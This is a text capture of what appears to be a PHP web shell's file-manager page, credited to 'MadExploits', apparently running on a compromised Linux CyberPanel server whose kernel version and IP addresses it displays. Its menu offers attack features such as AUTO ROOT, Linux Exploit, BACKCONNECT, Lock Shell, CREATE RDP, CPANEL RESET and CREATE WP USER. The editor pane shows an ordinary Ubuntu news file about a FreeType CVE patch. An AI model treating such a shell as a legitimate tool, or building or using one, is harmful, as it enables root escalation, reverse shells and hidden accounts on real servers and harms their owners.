Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
run /
ubuntu-advantage /
apt-news /
[ HOME SHELL ]
Name
Size
Permission
Action
aptnews.json
2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aptnews.json
{ "messages": [ { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["xenial"], "packages": [ ["libfreetype6", "<", "2.6.1-0.1ubuntu2.5+esm2"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["bionic"], "packages": [ ["libfreetype6", "<", "2.8.1-2ubuntu2.2+esm1"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["focal"], "packages": [ ["libfreetype6", "<", "2.10.1-2ubuntu0.4"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["jammy"], "packages": [ ["libfreetype6", "<", "2.11.1+dfsg-1ubuntu0.3"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] } ] }
Close